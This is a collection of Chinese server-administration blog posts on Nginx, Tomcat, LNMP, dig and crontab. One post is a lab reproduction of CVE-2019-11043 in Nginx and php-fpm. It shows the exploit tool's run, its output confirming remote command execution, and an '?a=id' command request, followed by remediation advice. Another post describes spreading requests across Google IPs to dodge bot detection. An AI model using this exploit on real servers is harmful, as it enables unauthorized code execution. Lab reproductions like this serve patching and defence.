今天在帮朋友迁移部署tomcat应用得时候遇到了这么个问题：原来是在Windows服务器上直接使用tomcat部署到80端口的，新机器是Linux+宝塔面板，要是直接部署到80端口，其他网站或者nginx这类的就只能换端口，很是不方便，我就建议她使用nginx反代tomcat应用，那么问题就来了，我不是第一次使用nginx反代，但是之前都是反代后端的网络应用，不存在这些问题，使用宝塔添加了网站后，把应用上传到tomcat的webapps目录下，名称为shop，在网站设置启用tomcat，但是测试的时候就发现后端不能获得网站使用者正确的请求域名，获取的是本地的，http://127.0.0.1:8080/shop/xxxxxx,导致出现一些bug，返回的路径是本地的：



经过初略阅读+搜索应用源代码，找到了关键代码：

 

想吐槽一下这个程序员，不合格！！！这都9102年了，判断居然没有443？？？WTF!!!不让程序使用SSL？？？什么操作。。。

先说一下这个 request.getServerName() ，根据API上写的：

Reconstructs the URL the client used to make the request. The returned URL contains a protocol, server name, port number, and server path, but it does not include query string parameters. 

也就是说, getRequestURL() 输出的是不带query string的路经(含协议 端口 server path等信息).

并且,还发现：

request.getScheme()  //总是 http，而不是实际的http或https  
request.isSecure()  //总是false（因为总是http）  
request.getRemoteAddr()  //总是 nginx 请求的 IP，而不是用户的IP  
request.getRequestURL()  //总是 nginx 请求的URL 而不是用户实际请求的 URL  
response.sendRedirect( 相对url )  //总是重定向到 http 上 （因为认为当前是 http 请求） 

接下来就该批斗宝塔了！

看看默认的启用tomcat的配置里面没有 proxy_set_header Host $host; 

最关键的就是没有这个，导致后端的Java程序的 request.getServerName() 获取不到正确的域名!

所以解决办法也简单，那就是在你的反代location里面加上 proxy_set_header Host $host;  后端就可以正确获取到当前的浏览器域名了。完事儿。



最后说一下，如果后端不是我上面说的那个不合格的程序员写的没有判断HTTPS的话，只需要在location里面添加 proxy_set_header X-Forwarded-Proto $scheme; 即可正确处理HTTPS了。



日常踩坑记录。。。



参考：

https://www.cnblogs.com/interdrp/p/4881785.html

https://blog.csdn.net/tpkey/article/details/18550039

0x00背景介绍 

来自Wallarm的安全研究员Andrew Danau在9月14号至16号举办的Real World CTF中，向服务器发送%0a(换行符)时，服务器返回异常信息，疑似存在漏洞

0x01漏洞描述 

当Nginx使用特定的fastcgi配置时，存在远程代码执行漏洞，但这个配置并非Nginx默认配置。

当fastcgi_split_path_info字段被配置为 ^(.+?.php)(/.*)$;时，攻击者可以通过精心构造的payload，造成远程代码执行漏洞，该配置已被广泛使用，危害较大

0x02漏洞编号 

CVE-2019-11043

0x03受影响版本 

当Nginx + php-fpm 的服务器有如下配置的时候，都会出现RCE漏洞

location ~ [^/]\.php(/|$) {
  ...
  fastcgi_split_path_info ^(.+?\.php)(/.*)$;
  fastcgi_param PATH_INFO       $fastcgi_path_info;
  fastcgi_pass   php:9000;
  ...
}

0x4漏洞复现环境： 

执行如下命令启动有漏洞的Nginx和PHP：

docker-compose up -d

环境启动后，访问http://your-ip:8080/index.php即可查看到一个默认页面。

0x5漏洞复现 

使用https://github.com/neex/phuip-fpizdam中给出的工具，发送数据包：

$ go run . "http://your-ip:8080/index.php"
2019/10/23 19:41:00 Base status code is 200
2019/10/23 19:41:00 Status code 502 for qsl=1795, adding as a candidate
2019/10/23 19:41:00 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
2019/10/23 19:41:02 Attack params found: --qsl 1790 --pisos 152 --skip-detect
2019/10/23 19:41:02 Trying to set "session.auto_start=0"...
2019/10/23 19:41:02 Detect() returned attack params: --qsl 1790 --pisos 152 --skip-detect <-- REMEMBER THIS
2019/10/23 19:41:02 Performing attack using php.ini settings...
2019/10/23 19:41:02 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/23 19:41:02 Trying to cleanup /tmp/a...
2019/10/23 19:41:02 Done!

可见，这里已经执行成功。

我们访问http://your-ip:8080/index.php?a=id，即可查看到命令已成功执行：



注意，因为php-fpm会启动多个子进程，在访问/index.php?a=id时需要多访问几次，以访问到被污染的进程。

0x6漏洞刨析 

因为“fpm_main.c”文件的第1150行代码中由于\n(%0a)的传入导致nginx传递给php-fpm的PATH_INFO为空。

https://github.com/php/php-src/blob/master/sapi/fpm/fpm/fpm_main.c#L1150

进而导致可以通过FCGI_PUTENV与PHP_VALUE相结合，修改当前的php-fpm进程中的php配置。在特殊构造的配置生效的情况下可以触发任意代码执行。

0x07修复建议 

1. 修改nginx配置文件中fastcgi_split_path_info的正则表达式,不允许.php之后传入不可显字符
2. 暂停使用 nginx+php-fpm 服务
3. 根据自己实际生产环境的业务需求，将以下配置删除

fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO       $fastcgi_path_info;

参考：

https://twitter.com/ahack_ru/status/1186667192139636740

https://github.com/neex/phuip-fpizdam

https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043

在ubuntu10.10下没有dig命令，而debian6下面有这个命令
ubuntu下想要apt-get安装，发现没有找到dig软件包
搜索后才发现正确安装是安装dnsutils

apt-get install dnsutils

PS:redhat系列这样安装

yum install bind-utils

看看dig命令大多时候如何可以取代nslookup的:

www@www:~# dig www.google.com

; <<>> DiG 9.9.5-9+deb8u14-Debian <<>> www.google.com
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 19569
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;www.google.com. IN A

;; ANSWER SECTION:
www.google.com. 164 IN A 216.58.194.196

;; Query time: 1 msec
;; SERVER: 108.61.10.10#53(108.61.10.10)
;; WHEN: Thu Oct 05 17:21:52 CST 2017
;; MSG SIZE rcvd: 59

只输出mx记录，简明使用
dig mx www.google.com +short
只输出NS记录
dig ns www.google.com
查询SOA( Start of Autority ) 返回主DNS服务器
dig soa www.google.com
指定dns，例如查询8.8.8.8中的www.google.com记录
dig +short @8.8.8.8 www.google.com
大部分的时候dig最下面显示了查询所用的时间及DNS服务器，时间，数据大小。DNS超时时间为30秒，查询时间对于排查DNS问题很有用。

;; Query time: 1 msec
;; SERVER: 108.61.10.10#53(108.61.10.10)
;; WHEN: Thu Oct 05 17:21:52 CST 2017
;; MSG SIZE rcvd: 59

nginx提示Failed to read PID from file /run/nginx.pid:

在centos7上，配置nginx代理服务后：
systemctl status nginx.service

提示错误：
Failed to read PID from file /run/nginx.pid: Invalid argument

看到好多说删掉改nginx.pid 文件的，试之，无效。

后来找到了一个方法：

mkdir -p /etc/systemd/system/nginx.service.d
printf "[Service]\nExecStartPost=/bin/sleep 0.1\n" > /etc/systemd/system/nginx.service.d/override.conf

然后：
systemctl daemon-reload
systemctl restart nginx.service

解决了问题。

Nginx 是一款高性能 Web 服务器软件，其有非常有益的IO表现，而且相较于 Apache Httpd 配置更加简单上手更加容易，本文将向大家介绍编译安装 Nginx 的第三方扩展。

Nginx 的额外扩展：

1. OpenSSL 1.1.0，提供 ALPN 支持，支持 HTTP/2
2. Nginx-CT，透明证书提高 HTTPS 网站的安全性和浏览器支持
3. ngx_PageSpeed，Google 家的网站性能优化工具
4. Brotli，实现比 Gzip 更高的压缩率
5. Jemalloc，优化内存管理

第一个openssl和最后一个jemalloc现在大多数的一件安装包都有包括,不做描述.需要的请自行Google搜索相关教程.今天主要说一下Nginx-CT,ngx_PageSpeed,Brotli这三个扩展的安装.(建议把第三方扩展都放在一个文件夹下面方便管理)

下载需要的源码包:

wget https://github.com/grahamedgecombe/nginx-ct/archive/v1.3.2.tar.gz

tar xzf v1.3.2.tar.gz

git clone https://github.com/google/ngx_brotli.git
cd ngx_brotli
git submodule update --init

wget https://github.com/pagespeed/ngx_pagespeed/archive/v1.12.34.3-stable.zip
unzip v1.12.34.3-stable.zip
cd ngx_pagespeed-1.12.34.3-stable/
wget https://dl.google.com/dl/page-speed/psol/1.12.34.2-x64.tar.gz
tar -xzvf 1.12.34.2-x64.tar.gz

接下来就是编译了,这是在已经安装好nginx的环境增加扩展,所有只需要make 不需要make install ,不然就覆盖安装了...

linux下错误提示很人性化的,多看提示,更具提示操作,基本上都可以解决问题.

重要步骤:

通过命令 nginx -V 查看nginx的配置及其已有的扩展.我们只需要在后面增加模块即可:

比如使用nginx -V命令查看结果类似于下面:

--prefix=/usr/local/nginx --with-http_stub_status_module

我们只需要在原有的基础上添加我们的模块即可:

./configure --prefix=/usr/local/nginx --with-http_stub_status_module --add-module=/data/software/nginx-ct-1.3.2 --add-module=/data/software/ngx_brotli --add-module=/data/software/ngx_pagespeed-1.12.34.3-stable

等它自动配置完成后,直接 make 一下就行.

然后备份原有已安装好的nginx:

cp /usr/local/nginx/sbin/nginx /usr/local/nginx/sbin/nginx.bak
service nginx stop

然后将刚刚编译好的nginx覆盖掉原有的nginx（这个时候nginx要停止状态,通过上面的命令,已经停止了）:

cp ./objs/nginx /usr/local/nginx/sbin/

然后启动nginx (service nginx start)，就可以通过命令nginx -V 查看第三方扩展是否已经加入成功.

PS:笔记+分享,好的扩展,开源产品大家都应该去体验一下!

写这篇文章的缘由是看见了我的博友Secret他写了一篇文章:

造轮子之谷歌镜像站 让我想起了 之前自己折腾过的nginx扩展镜像Google,效率比这个高,而且支持高级的配置,多级配合组成类似集群的功能,今天又折腾了一下,所以写一下过程,以方便后来需要的人.

声明:请在法律允许范围内合理使用搜索引擎,本文只作为技术笔记,不负任何责任.

---

1. 更新库
2. apt-get update
3.  
4. # 安装 gcc & git
5. apt-get install build-essential git gcc g++ make -y
6.  
7. # nginx 官网: http://nginx.org/en/download.html
8. wget "http://nginx.org/download/nginx-1.8.1.tar.gz"
9.  
10. # pcre 官网:http://www.pcre.org/
11. wget "ftp://ftp.csx.cam.ac.uk/pub/software/programming/pcre/pcre-8.39.tar.gz"
12.  
13. # opessl 官网:https://www.openssl.org/
14. wget "https://www.openssl.org/source/openssl-1.0.1t.tar.gz"
15.  
16. # zlib 官网:http://www.zlib.net/
17. wget "http://zlib.net/zlib-1.2.8.tar.gz"
18.  
19. # 下载本扩展
20. git clone https://github.com/cuber/ngx_http_google_filter_module
21.  
22. # 下载 substitutions 扩展
23. git clone https://github.com/yaoweibin/ngx_http_substitutions_filter_module
24.  
25. # 解压缩
26. tar xzvf nginx-1.8.1.tar.gz && tar xzvf pcre-8.39.tar.gz && tar xzvf openssl-1.0.1t.tar.gz && tar xzvf zlib-1.2.8.tar.gz
27.  
28. # 进入 nginx 源码目录
29. cd nginx-1.8.1
30.  
31. # 创建 nginx 安装目录
32. mkdir /usr/local/nginx-1.8.1

编译nginx及其扩展

1. # 设置编译选项
2. ./configure \
3. --prefix=/usr/local/nginx-1.8.1 \
4. --with-pcre=../pcre-8.39 \
5. --with-openssl=../openssl-1.0.1t \
6. --with-zlib=../zlib-1.2.8 \
7. --with-http_ssl_module \
8. --add-module=../ngx_http_google_filter_module \
9. --add-module=../ngx_http_substitutions_filter_module
10.  
11. # 编译, 安装
12. # 如果扩展有报错, 请发 issue 到
13. # https://github.com/cuber/ngx_http_google_filter_module/issues
14. make
15. make install

 最后启动nginx,访问你的服务器IP或者是解析到上面的域名,即可看到nginx是否安装好.

ngx_http_google_filter_module项目github地址(他那里也有说明,不过是英文的,能看懂的可以直接去看原文):

https://github.com/cuber/ngx_http_google_filter_module

---

下面说一下nginx的配置:

1. 简单的单机配置https,已经不支持http反代了

1. server {
2. server_name <你的域名>;
3. listen 443;
4.  
5. ssl on;
6. ssl_certificate <你的证书>;
7. ssl_certificate_key <你的私钥>;
8.  
9. resolver 8.8.8.8;
10. location / {
11. google on;
12. }
13. }

1. 进阶配置:配置多个服务器来缓解并发和出现验证码的频率

google_scholar 依赖于 google, 所以 google_scholar 无法独立使用. 由于谷歌学术近日升级, 强制使用 https 协议, 并且 ncr 已经支持, 所以不再需要指定谷歌学术的 tld

1. location / {
2. google on;
3. google_scholar on;
4. # 设置成德文,默认的语言是中文简体
5. google_language "de";
6. }

---

Upstreaming

upstream 减少一次域名解析的开销, 并且通过配置多个网段的 google ip 能够一定程度上减少被 google 机器人识别程序侦测到的几率 (弹验证码). upstream 参数要放在 http{} 中(也就是放在server{}配置外)，注意这个参数只有你加了SSL证书是https的时候才会有效，否则会报错！ 寻找这个参数的谷歌IP很简单，在你的VPS上面 ping www.google.com ，获得的IP把最后一位数 加1或者减1 就行了。

upstream www.google.com {
  server 173.194.38.1:443;
  server 173.194.38.2:443;
  server 173.194.38.3:443;
  server 173.194.38.4:443;
}

Proxy Protocol--代理保护

默认情况下，代理将使用https与后端服务器通信。您可以使用google_ssl_off强制某些域名回退到http协议。如果要通过没有ssl证书的另一个网关来代理某些域，这是非常有用的。

#
# eg. 
# i want to proxy the domain 'www.google.com' like this
# vps(hk) -> vps(us) -> google
#

#
# configuration of vps(hk)
#
server {
  # ...
  location / {
    google on;
    google_ssl_off "www.google.com";
  }
  # ...
}

upstream www.google.com {
  server < ip of vps(us) >:80;
}

#
# configuration of vps(us)
#
server {
  listen 80;
  server_name www.google.com;
  # ...
  location / {
    proxy_pass https://www.google.com;
  }
  # ...
}

所有的这些配置都是在全新的机器上配置,如果你已经配置好了nginx那么,也很容易,你只需要重新添加扩展动态编译进去就好了,编译完切记不要make install,只需要make编译,然后覆盖就行.

./configure \
--prefix=/usr/local/nginx \
--user=www \
--group=www \
--with-http_stub_status_module \
--with-http_v2_module \
--with-http_ssl_module \
--with-http_gzip_static_module \
.......
--add-module=/data/software/ngx_http_google_filter_module \
--add-module=/data/software/ngx_http_substitutions_filter_module

注意:你需要在nginx的源码包文件夹下面执行这个./configure命令,使用之前先使用 nginx-V 查看nginx版本下载相同版本的源码包,添加扩展的时候要注意路径,在最好复制的时候先停止nginx,同时以防万一,先拷贝一份nginx在覆盖.参考资料如下:

http://imshusheng.com/linux/173.html

http://www.ttlsa.com/nginx/how-to-install-nginx-third-modules/

http://coolnull.com/4245.html

就到这里了.下次再见:) 最后 欢迎访问我的Google镜像:gg.mrxn.net

今天把停了半年的博客又重新放出来了.换了个机器,故环境变了,不是apache了,之前的.htaccess配置在nginx下就没用了.所以就重新找到了方法,记录一下在nginx下设置emlog的伪静态规则:

引入自定义emlog伪静态nginx规则文件。假如没有emlog.conf文件，你可以在nginx配置文件夹里新建一个emlog.conf文件。内容如下：

location / {
        index index.php index.html;
        if (!-e $request_filename)
        {
                rewrite ^/(.+)$ /index.php last;
        }
}

然后我们在nginx.conf引入这个伪静态规则即可.include emlog.conf;
然后重启nginx,service nginx reload .

前言:这几天帮朋友部署一个项目,一开始为了方便,(我懒-_-|),使用一键lanmp脚本部署,结果项目测试的时候bug一大堆...,声明:这不是说这些一键脚本不好,客观的来说,这些脚本用来建站,普通的单纯的站,一般没问题的,也很方便,但是部署项目,如果对这个脚本不是特别了解,特别了解,特别了解!重要的是说三遍...千万不要用,老实的手动部署环境吧....于是本想写一篇的,但是发现有人写了...就转载过来,存着当笔记吧.

本文档介绍如何使用一台普通配置的云服务器ECS实例搭建LNMP平台的web环境。

• Linux：自由和开放源码的类UNIX操作系统。
• Nginx：轻量级网页服务器、反向代理服务器。
• MySQL：关系型数据库管理系统。
• PHP：主要适用于Web开发领域的一种脚本语言。

适用对象

适用于熟悉Linux操作系统，刚开始使用阿里云进行建站的个人用户。

基本流程

使用云服务器 ECS 搭建LNMP平台的操作步骤如下：

1. 准备编译环境
2. 安装nginx
3. 安装mysql
4. 安装php-fpm
5. 测试访问

步骤一：准备编译环境

1、系统版本说明

# cat /etc/redhat-release 
CentOS release 6.5 (Final)

注：这是本文档实施时参考的系统版本。您的实际使用版本可能与此不同，下文中的nginx，mysql，及php版本，您也可以根据实际情况选择相应版本。

2、关闭SELINUX

修改配置文件，重启服务后永久生效。

# sed -i 's/SELINUX=.*/SELINUX=disabled/g' /etc/selinux/config

命令行设置立即生效。

# setenforce 0

3、安全组设置

在ECS安全组放行需访问的端口和访问白名单，下面的示例表示允许所有IP访问服务器的80端口。您可以根据实际情况放行允许访问的客户端IP。

步骤二：安装nginx

Nginx是一个小巧而高效的Linux下的Web服务器软件，是由 Igor Sysoev 为俄罗斯访问量第二的 Rambler.ru 站点开发的，已经在一些俄罗斯的大型网站上运行多年，目前很多国内外的门户网站、行业网站也都在是使用Nginx，相当稳定。

1、下载源码包解压编译。

# wget http://nginx.org/download/nginx-1.10.2.tar.gz
# tar xvf nginx-1.10.2.tar.gz -C /usr/local/src
# yum groupinstall "Development too
# yum -y install gcc wget gcc-c++ automake autoconf libtool libxml2-devel libxslt-devel perl-devel perl-ExtUtils-Embed pcre-devel openssl-devel
# cd /usr/local/src/nginx-1.10.2
# ./configure \
--prefix=/usr/local/nginx \
--sbin-path=/usr/sbin/nginx \
--conf-path=/etc/nginx/nginx.conf \
--error-log-path=/var/log/nginx/error.log \
--http-log-path=/var/log/nginx/access.log \
--pid-path=/var/run/nginx.pid \
--lock-path=/var/run/nginx.lock \
--http-client-body-temp-path=/var/tmp/nginx/client \
--http-proxy-temp-path=/var/tmp/nginx/proxy \
--http-fastcgi-temp-path=/var/tmp/nginx/fcgi \
--http-uwsgi-temp-path=/var/tmp/nginx/uwsgi \
--http-scgi-temp-path=/var/tmp/nginx/scgi \
--user=nginx \
--group=nginx \
--with-pcre \
--with-http_v2_module \
--with-http_ssl_module \
--with-http_realip_module \
--with-http_addition_module \
--with-http_sub_module \
--with-http_dav_module \
--with-http_flv_module \
--with-http_mp4_module \
--with-http_gunzip_module \
--with-http_gzip_static_module \
--with-http_random_index_module \
--with-http_secure_link_module \
--with-http_stub_status_module \
--with-http_auth_request_module \
--with-mail \
--with-mail_ssl_module \
--with-file-aio \
--with-ipv6 \
--with-http_v2_module \
--with-threads \
--with-stream \
--with-stream_ssl_module
# make && make install
# mkdir -pv /var/tmp/nginx/client

2、添加SysV启动脚本。

# vim /etc/init.d/nginx
#!/bin/sh 
# 
# nginx - this script starts and stops the nginx daemon 
# 
# chkconfig:   - 85 15 
# description: Nginx is an HTTP(S) server, HTTP(S) reverse \ 
#               proxy and IMAP/POP3 proxy server 
# processname: nginx 
# config:      /etc/nginx/nginx.conf 
# config:      /etc/sysconfig/nginx 
# pidfile:     /var/run/nginx.pid 
# Source function library. 
. /etc/rc.d/init.d/functions
# Source networking configuration. 
. /etc/sysconfig/network
# Check that networking is up. 
[ "$NETWORKING" = "no" ] && exit 0
nginx="/usr/sbin/nginx"
prog=$(basename $nginx)
NGINX_CONF_FILE="/etc/nginx/nginx.conf"
[ -f /etc/sysconfig/nginx ] && . /etc/sysconfig/nginx
lockfile=/var/lock/subsys/nginx
start() {
    [ -x $nginx ] || exit 5
    [ -f $NGINX_CONF_FILE ] || exit 6
    echo -n $"Starting $prog: " 
    daemon $nginx -c $NGINX_CONF_FILE
    retval=$?
    echo 
    [ $retval -eq 0 ] && touch $lockfile
    return $retval
}
stop() {
    echo -n $"Stopping $prog: " 
    killproc $prog -QUIT
    retval=$?
    echo 
    [ $retval -eq 0 ] && rm -f $lockfile
    return $retval
killall -9 nginx
}
restart() {
    configtest || return $?
    stop
    sleep 1
    start
}
reload() {
    configtest || return $?
    echo -n $"Reloading $prog: " 
    killproc $nginx -HUP
RETVAL=$?
    echo 
}
force_reload() {
    restart
}
configtest() {
$nginx -t -c $NGINX_CONF_FILE
}
rh_status() {
    status $prog
}
rh_status_q() {
    rh_status >/dev/null 2>&1
}
case "$1" in
    start)
        rh_status_q && exit 0
    $1
        ;;
    stop)
        rh_status_q || exit 0
        $1
        ;;
    restart|configtest)
        $1
        ;;
    reload)
        rh_status_q || exit 7
        $1
        ;;
    force-reload)
        force_reload
        ;;
    status)
        rh_status
        ;;
    condrestart|try-restart)
        rh_status_q || exit 0
            ;;
    *)
      echo $"Usage: $0 {start|stop|status|restart|condrestart|try-restart|reload|force-reload|configtest}" 
        exit 2
esac

3、赋予脚本执行权限。

# chmod +x /etc/init.d/nginx

4、添加至服务管理列表，设置开机自启。

# chkconfig --add nginx
# chkconfig  nginx on

5、启动服务。

# service nginx start

6、浏览器访问可看到默认欢迎页面。

步骤三：安装mysql

1、准备编译环境。

# yum groupinstall "Server Platform Development"  "Development tools" -y
# yum install cmake -y

2、准备mysql数据存放目录。

# mkdir /mnt/data
# groupadd -r mysql
# useradd -r -g mysql -s /sbin/nologin mysql
# id mysql
uid=497(mysql) gid=498(mysql) groups=498(mysql)

3、更改数据目录属主属组。

# chown -R mysql:mysql /mnt/data

4、解压编译官网下载稳定版的源码包。

# tar xvf mysql-5.6.24.tar.gz -C  /usr/local/src
# cd /usr/local/src/mysql-5.6.24
# cmake . -DCMAKE_INSTALL_PREFIX=/usr/local/mysql \
-DMYSQL_DATADIR=/mnt/data \
-DSYSCONFDIR=/etc \
-DWITH_INNOBASE_STORAGE_ENGINE=1 \
-DWITH_ARCHIVE_STORAGE_ENGINE=1 \
-DWITH_BLACKHOLE_STORAGE_ENGINE=1 \
-DWITH_READLINE=1 \
-DWITH_SSL=system \
-DWITH_ZLIB=system \
-DWITH_LIBWRAP=0 \
-DMYSQL_TCP_PORT=3306 \
-DMYSQL_UNIX_ADDR=/tmp/mysql.sock \
-DDEFAULT_CHARSET=utf8 \
-DDEFAULT_COLLATION=utf8_general_ci
# make && make install

5、修改安装目录的属组为mysql。

# chown -R mysql:mysql /usr/local/mysql/

6、初始化数据库。

# /usr/local/mysql/scripts/mysql_install_db --user=mysql --datadir=/mnt/data/

注：在CentOS 6.5版操作系统的最小安装完成后，在/etc目录下会存在一个my.cnf，需要将此文件更名为其他的名字，如：/etc/my.cnf.bak，否则，该文件会干扰源码安装的MySQL的正确配置，造成无法启动。

7、拷贝配置文件和启动脚本。

# cp /usr/local/mysql/support-files/mysql.server /etc/init.d/mysqld
# chmod +x /etc/init.d/mysqld
# cp support-files/my-default.cnf /etc/my.cnf

8、设置开机自动启动。

# chkconfig mysqld  on 
# chkconfig --add mysqld

9、修改配置文件中的安装路径及数据目录存放路径。

# echo -e "basedir = /usr/local/mysql\ndatadir = /mnt/data\n" >> /etc/my.cnf

10、设置PATH环境变量。

# echo "export PATH=$PATH:/usr/local/mysql/bin" > /etc/profile.d/mysql.sh      
# source /etc/profile.d/mysql.sh

11、启动服务。

# service mysqld start 
# mysql -h 127.0.0.1

步骤四：安装php-fpm

Nginx本身不能处理PHP，作为web服务器，当它接收到请求后，不支持对外部程序的直接调用或者解析，必须通过FastCGI进行调用。如果是PHP请求，则交给PHP解释器处理，并把结果返回给客户端。PHP-FPM是支持解析php的一个FastCGI进程管理器。提供了更好管理PHP进程的方式，可以有效控制内存和进程、可以平滑重载PHP配置。

1、安装依赖包。

# yum groupinstall "X Software Development"
# yum install libmcrypt libmcrypt-devel mhash mhash-devel libxml2 libxml2-devel bzip2 bzip2-devel

2、解压官网下载的源码包，编译安装。

# tar xvf php-5.6.23.tar.bz2 -C /usr/local/src
# cd /usr/local/src/php-5.6.23
# ./configure --prefix=/usr/local/php \
--with-config-file-scan-dir=/etc/php.d \
--with-config-file-path=/etc \
--with-mysql=/usr/local/mysql \
--with-mysqli=/usr/local/mysql/bin/mysql_config \
--enable-mbstring \
--with-freetype-dir \
--with-jpeg-dir \
--with-png-dir \
--with-zlib \
--with-libxml-dir=/usr \
--with-openssl \
-enable-xml \
--enable-sockets \
--enable-fpm \
--with-mcrypt \
--with-bz2
# make && make install

3、添加php和php-fpm配置文件。

# cp /usr/local/src/php-5.6.23/php.ini-production /etc/php.ini
# cd /usr/local/php/etc/
# cp php-fpm.conf.default php-fpm.conf
# sed -i 's@;pid = run/php-fpm.pid@pid = /usr/local/php/var/run/php-fpm.pid@' php-fpm.conf

4、添加php-fpm启动脚本。

# cp /usr/local/src/php-5.6.23/sapi/fpm/init.d.php-fpm /etc/init.d/php-fpm
# chmod +x /etc/init.d/php-fpm

5、添加php-fpm至服务列表并设置开机自启。

# chkconfig --add php-fpm     
# chkconfig --list php-fpm     
# chkconfig php-fpm on

6、启动服务。

# service php-fpm start

7、添加nginx对fastcgi的支持，首先备份默认的配置文件。

# cp /etc/nginx/nginx.conf /etc/nginx/nginx.confbak
# cp /etc/nginx/nginx.conf.default /etc/nginx/nginx.conf

编辑/etc/nginx/nginx.conf，在所支持的主页面格式中添加php格式的主页，类似如下：

        location / {
            root   /usr/local/nginx/html;
            index  index.php index.html index.htm;
        }

取消以下内容前面的注释：

       location ~ \.php$ {
            root           /usr/local/nginx/html;
            fastcgi_pass    127.0.0.1:9000;
            fastcgi_index   index.php;
            fastcgi_param  SCRIPT_FILENAME  /usr/local/nginx/html/$fastcgi_script_name;
            include        fastcgi_params;
        }

重新载入nginx的配置文件。

# service nginx reload

在/usr/local/nginx/html/新建index.php的测试页面，内容如下。

# cat index.php 
<?php
$conn=mysql_connect('127.0.0.1','root','');
if ($conn){
  echo "LNMP platform connect to mysql is successful!";
}else{
  echo "LNMP platform connect to mysql is failed!";
}
 phpinfo();
?>

浏览器访问测试，如看到以下内容则表示LNMP平台构建完成。

原文地址:https://help.aliyun.com/document_detail/50700.html

今天有朋友问我怎么配置虚拟机，使其支持访问者打开首页时自动跳转到https，而非http，因为是虚拟机，重复-虚拟机，所以呢，配置服务器的那些方法不好使，搜索得到如下方法，利用修改 伪静态规则 文件- .htaccess ，使虚拟机也可以支持直接打开网站跳转到https，具体方法如下，在htaccess文件末尾添加如下代码即可实现：

RewriteCond %{SERVER_PORT} !^443$
RewriteRule ^.*$ https://%{SERVER_NAME}%{REQUEST_URI} [L,R]

一行一条命令，其实就是利用伪静态将访问者跳转到443端口，从而实现了http到https的跳转。

注：此为虚拟机的方法，推荐使用服务器自己配置https，虚拟机的这样配置后，有可能导致蜘蛛不能抓取你的网站，对SEO不好，慎重选择！

操作前记得备份相关文件，以及数据！

服务器配置https方面可以参考如下文章：

emlog 使用ssl证书开启HTTPS安全访问三步曲

nginx配置ssl加密（单双向认证、部分https）

NginxRewrite规则判断普通用户与搜索引擎爬虫（UA）实现https跳转

SSL证书与Https应用部署小结

今晚吃完饭不久，邮箱就收到服务器发来的邮件，报告大量可疑请求，当时没有回家，没有电脑，等我赶回家的时候，服务器就已经自动关闭了。。。

      

回家后，第一件事就是关闭服务器所有非必要端口和服务，下载日志到本地分析，找可疑的攻击源，从日志中分析得到大概如下内容：

conntrack table (truncated)的记录中记录大量的443端口请求和80端口请求，导致443端口和80端口被占用，一般没有使用https加密的网站不会使用443端口（估计是因为使用https访问，一般的扫描软件不能扫描到啥有用的信息），使正常访问者不能访问，其实我就是想说就是大量DDoS+CC攻击，一看就是小学生之手！真是无聊。不过的感谢这些小学生啊，让我又重新配置了服务器，提升服务器的安全性。现在CC和少量ddos基本上没作用了的哈！欢迎压力测试！当然，大流量攻击连用了上百台高档服务器做了负载均衡的新浪都扛不住，何况我这个个小小的普通服务器呢！高手就请放过小站，感激不尽！

最后呢，希望做独立站的站长朋友们，一定要做好安全措施，修改常用端口，屏蔽不用的端口，文件夹权限设置严密，别给小学生骚扰的机会，烦死了！至于分析日志这些东西，自己百度吧，多得是，也不是一两句话就可以说清楚的。欢迎各位站长一起交流服务器攻防，运维！

VPS或者服务器上经常会需要VPS或者服务器上经常会需要定时备份数据、定时执行重启某个服务或定时执行某个程序等等，一般在Linux使用Crontab，Windows下面是用计划任务(Win的都是图形界面设置比较简单)，下面主要介绍Linux VPS/服务器上Crontab的安装及使用。

Crontab是一个Unix/Linux系统下的常用的定时执行工具，可以在无需人工干预的情况下运行指定作业。

一、Crontab的安装

1、CentOS下面安装Crontab

yum install vixie-cron crontabs      //安装Crontab
chkconfig crond on                //设为开机自启动
service crond start                 //启动

说明：vixie-cron软件包是cron的主程序；crontabs软件包是用来安装、卸装、 或列举用来驱动 cron 守护进程的表格的程序。

2、Debian下面安装Crontab

apt-get install cron             //大部分情况下Debian都已安装。
/etc/init.d/cron restart    //重启Crontab

二、Crontab使用方法

1、查看crontab定时执行任务列表

crontab -l

2、添加crontab定时执行任务

crontab -e

输入crontab任务命令时可能会因为crontab默认编辑器的不同。

如上图所示为nano编辑器，使用比较简单，直接在文件末尾按crontab命令格式输入即可，Ctrl+x退出，再输y 回车保存。

另外一种是vi编辑器，首先按i键，在文件末尾按crontab命令格式输入，再按ESC键，再输入:wq 回车即可。

3、crontab 任务命令书写格式

格式：	minute	hour	dayofmonth	month	dayofweek	command
解释：	分钟	小时	日期	月付	周	命令
范围：	0-59	0～23	1～31	1～12	0～7，0和7都代表周日

在crontab中我们会经常用到* ,   -  /n 这4个符号，好吧还是再画个表格，更清楚些：

下面举一些例子来加深理解：

每天凌晨3:00执行备份程序：0 3 * * * /root/backup.sh

每周日8点30分执行日志清理程序：30 8 * * 7 /root/clear.sh

每周1周5 0点整执行test程序：0 0 * * 1,5 test

每年的5月12日14点执行wenchuan程序：0 14 12 5 * /root/wenchuan

每晚18点到23点每15分钟重启一次php-fpm：*/15 18-23 * * * /etc/init.d/php-fpm

其他一些命令:

/sbin/service crond start //启动服务
/sbin/service crond stop //关闭服务
/sbin/service crond restart //重启服务
/sbin/service crond reload //重新载入配置
service crond status //查看crontab服务状态
service crond start //手动启动crontab服务

4，设置定时任务：【语　　法：crontab [-u <用户名称>][配置文件] 或crontab [-u <用户名称>][-elr]】

5，参　　数：

-e 　编辑该用户的计时器设置。

-l 　列出该用户的计时器设置。

-r 　删除该用户的计时器设置。

-u<用户名称> 　指定要设定计时器的用户名称。

6，格式：分　时　日　月　周　 命令

7，列举，比如我要每天的23点50重启nginx服务，那么，我就输入如下命令：

crontab -e

然后打开一个编辑窗口，按下 insert 按键或者是i，输入：

50 23 * * * /etc/init.d/nginx restart

1，crontab命令

功能说明：设置计时器。

语　　法：crontab [-u <用户名称>][配置文件] 或 crontab [-u <用户名称>][-elr]

